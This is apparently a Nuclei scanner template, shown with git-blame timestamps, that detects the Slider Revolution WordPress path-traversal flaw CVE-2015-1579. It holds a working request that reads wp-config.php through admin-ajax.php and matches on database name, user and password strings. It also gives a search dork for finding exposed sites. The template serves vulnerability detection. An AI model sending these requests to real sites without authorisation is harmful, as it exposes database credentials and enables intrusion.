2022-08-06 16:54:58 +00:00
id : CVE-2015-1579
2022-04-22 10:38:41 +00:00
2022-07-29 14:04:23 +00:00
info :
2022-08-06 16:54:58 +00:00
name : WordPress Slider Revolution - Local File Disclosure
2022-07-29 14:04:23 +00:00
author : pussycat0x
severity : high
2022-08-10 07:57:48 +00:00
description : |
Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE : this vulnerability may be a duplicate of CVE-2014-9734.
2022-07-29 14:04:23 +00:00
reference :
- https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
- https://cxsecurity.com/issue/WLB-2021090129
2022-08-06 16:54:58 +00:00
- https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80
2022-08-10 07:57:48 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-1579
2022-07-29 14:04:23 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-08-06 16:54:58 +00:00
cve-id : CVE-2015-1579
2022-08-25 08:56:24 +00:00
cwe-id : CWE-22
2022-07-29 14:04:23 +00:00
metadata :
google-dork : inurl:/wp-content/plugins/revslider
2022-08-10 11:20:19 +00:00
tags : cve,cve2015,wordpress,wp-plugin,lfi,revslider,wp
2022-04-22 10:38:41 +00:00
2022-07-29 14:04:23 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
- '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
2022-08-10 07:57:48 +00:00
stop-at-first-match : true
2022-07-29 14:04:23 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- "'DB_NAME'"
- "'DB_PASSWORD'"
- "'DB_USER'"
condition : and
- type : status
status :
- 200
# Enhanced by mp on 2022/07/29